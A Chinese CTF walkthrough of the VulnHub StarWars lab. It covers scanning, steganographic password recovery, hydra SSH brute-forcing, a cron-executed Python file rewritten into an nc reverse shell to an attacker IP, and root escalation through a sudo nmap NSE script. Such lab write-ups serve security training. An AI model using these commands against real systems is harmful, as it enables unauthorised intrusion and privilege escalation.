今天实践的是vulnhub的StarWars镜像,
下载地址,https://download.vulnhub.com/starwars/StarWars-Epi1-CTF.ova,
用workstation导入失败,
于是又用virtualbox导入,做地址扫描,
sudo netdiscover -r 192.168.1.0/24,109就是,
再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.109,
有web服务,浏览器访问http://192.168.1.109,
提示了从图片里获取密码,猜测到一张图片是另一张图片做过数字隐写,
把yoda.png提交给在线解密站点,获取到了密码,babyYoda123,
https://stylesuxx.github.io/steganography/,
继续对靶机进行文件路径暴破,
dirb http://192.168.1.109 -X .php,.js,.txt,
浏览器访问http://192.168.1.109/users.js,获取到skywalker和han,
尝试出有效的用户名密码组合,han/babyYoda123,
ssh登录,ssh [email protected],不是root,也不方便提权,
浏览器访问http://192.168.1.109/robots.txt,获取到/r2d2路径,
浏览器访问http://192.168.1.109/r2d2,
爬取关键字做密码字典,cewl http://192.168.1.109/r2d2 > dict.txt,
针对另一个之前获取到的用户名做暴破,
hydra -l skywalker -P dict.txt 192.168.1.109 ssh,
获取到有效的用户名密码组合,skywalker/tatooine,
ssh登录,ssh [email protected],不是root,也不方便提权,
找到一个当前用户下可执行的python脚本evil.py,并且知道这个脚本每分钟被系统自动执行一次,
编辑文件,把内容改成反弹shell,vi evil.py,
import os
os.system("nc -e /bin/bash 192.168.1.108 4444")
在kali攻击机上用nc开个反弹shell监听,等一分钟shell就过来了,
转成交互式shell,python -c 'import pty; pty.spawn("/bin/bash")',
sudo -l发现root权限执行的程序nmap,
利用nmap执行插件脚本的特性,把root的shell搞出来,id确认没问题,
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之StarWars的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论